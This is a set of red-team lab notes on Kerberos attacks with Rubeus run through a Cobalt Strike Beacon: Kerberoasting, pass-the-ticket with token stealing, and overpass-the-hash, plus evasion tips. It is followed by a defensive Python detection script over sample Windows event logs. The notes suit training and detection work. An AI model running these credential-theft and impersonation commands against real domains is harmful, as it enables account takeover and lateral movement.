rubeus
usage
kerberoasting
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
Pass-the-Ticket (Kerberos)
Adds Kerberos tickets to an existing logon session (LUID).
The first step is to create a blank, “sacrificial” logon session that we can pass the TGT into. We do this because a logon session can only hold a single TGT at a time. If we passed jking’s TGT into the LUID for bfarmer, it would erase bfarmer’s TGT and cause all sorts of authentication issues for the user.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
# -> this creates a new process with a new LUID (shown in the output); import the ticket into that LUID
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
# -> steal token from the new process
# now impersonate that session
beacon> steal_token 4748
# revert back and clean up
beacon> rev2self
beacon> kill 4748
By default, a random username and password are used for the new process; we can make this appear less suspicious by using more common names:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123
overpass-the-hash
Overpass the hash is a technique which allows us to request a Kerberos TGT for a user, using their NTLM or AES hash. Elevated privileges are required to obtain user hashes, but not to actually request a ticket.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap
The TGT can then be used via pass-the-ticket.
OPSEC: we can change the request ID and the domain used to better fit standard TGT traffic:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /domain:DEV /opsec /nowrap
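As an added example, not part of these notes and not Rubeus code, the following Python rules show what each of the three techniques above (Kerberoasting, Pass-the-Ticket via createnetonly, and overpass-the-hash) leaves in the Windows Security log and how a defender flags it. The events are constructed samples that mirror a subset of the EVTX fields (4769 service-ticket requests, 4768 TGT requests, 4624 logons); encryption types are given as integers rather than the "0x17"/"0x12" strings Windows writes, and the IP addresses are made up. The user names are taken from the notes above.

```python
"""Detection rules for the Kerberos tradecraft described above (added example)."""

RC4_HMAC = 0x17   # TicketEncryptionType for RC4-HMAC (NTLM-derived key)
AES256 = 0x12     # TicketEncryptionType for AES256-CTS-HMAC-SHA1-96

# Constructed sample Security events (simplified EVTX field subset), not real logs.
SAMPLE_EVENTS = [
    # Two RC4 service tickets for user-account SPNs from one host: Kerberoast pattern.
    {"EventID": 4769, "TargetUserName": "bfarmer@DEV.CYBERBOTIC.IO", "ServiceName": "mssql_svc",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.17.231"},
    {"EventID": 4769, "TargetUserName": "bfarmer@DEV.CYBERBOTIC.IO", "ServiceName": "http_svc",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.17.231"},
    # Normal AES service ticket for a machine account: benign.
    {"EventID": 4769, "TargetUserName": "bfarmer@DEV.CYBERBOTIC.IO", "ServiceName": "WKSTN-1$",
     "TicketEncryptionType": AES256, "IpAddress": "10.10.17.231"},
    # RC4 TGT request in an AES-capable domain: consistent with asktgt /ntlm.
    {"EventID": 4768, "TargetUserName": "jking", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.17.231"},
    # AES TGT request: indistinguishable by etype from a normal logon (see note below).
    {"EventID": 4768, "TargetUserName": "nlamb", "ServiceName": "krbtgt",
     "TicketEncryptionType": AES256, "IpAddress": "10.10.17.25"},
    # LogonType 9 (NewCredentials) via seclogo: what createnetonly / runas /netonly produce.
    {"EventID": 4624, "TargetUserName": "bfarmer", "LogonType": 9,
     "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    # Ordinary interactive logon: benign.
    {"EventID": 4624, "TargetUserName": "nlamb", "LogonType": 2,
     "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
]


def is_machine_or_krbtgt(service: str) -> bool:
    """Machine accounts (trailing $) and krbtgt are not roastable targets."""
    return service.endswith("$") or service.lower() == "krbtgt"


def detect_kerberoast(events):
    """4769 with RC4 for a user-account SPN: an offline-crackable service ticket."""
    return [e for e in events
            if e["EventID"] == 4769
            and e.get("TicketEncryptionType") == RC4_HMAC
            and not is_machine_or_krbtgt(e["ServiceName"])]


def roast_burst(events, threshold=2):
    """Group RC4 service tickets by requesting IP; several distinct SPNs
    from one source in a short window is the bulk-roasting signature."""
    per_ip = {}
    for e in detect_kerberoast(events):
        per_ip.setdefault(e["IpAddress"], set()).add(e["ServiceName"])
    return {ip: sorted(s) for ip, s in per_ip.items() if len(s) >= threshold}


def detect_rc4_tgt(events):
    """4768 with RC4 etype: in a domain where clients negotiate AES, an RC4
    AS-REQ points at a TGT requested from an NTLM hash."""
    return [e for e in events
            if e["EventID"] == 4768 and e.get("TicketEncryptionType") == RC4_HMAC]


def detect_netonly_logon(events):
    """4624 LogonType 9 through the seclogo logon process: a new-credentials
    logon session, the kind createnetonly builds to receive a passed ticket."""
    return [e for e in events
            if e["EventID"] == 4624
            and e.get("LogonType") == 9
            and e.get("LogonProcessName", "").lower() == "seclogo"]


def run_all(events):
    """Summarise every rule's hits by the field a triager would pivot on."""
    return {
        "kerberoast": [e["ServiceName"] for e in detect_kerberoast(events)],
        "roast_burst": roast_burst(events),
        "rc4_tgt": [e["TargetUserName"] for e in detect_rc4_tgt(events)],
        "netonly_logon": [e["TargetUserName"] for e in detect_netonly_logon(events)],
    }


if __name__ == "__main__":
    for rule, hits in run_all(SAMPLE_EVENTS).items():
        print(f"{rule}: {hits}")
```

Two caveats the rules make visible: the etype check catches the `/ntlm` form of overpass-the-hash but not the `/aes256` form, whose 4768 looks like any AES logon, so the AES case has to be caught by correlating the source host of the TGT request against where that user normally logs on (the `/opsec` and `/domain` options exist precisely to make the request itself look native); and a LogonType 9 seclogo logon is also what a legitimate `runas /netonly` produces, so that rule is a triage signal to be joined with the parent process and the ticket activity that follows, not a verdict on its own.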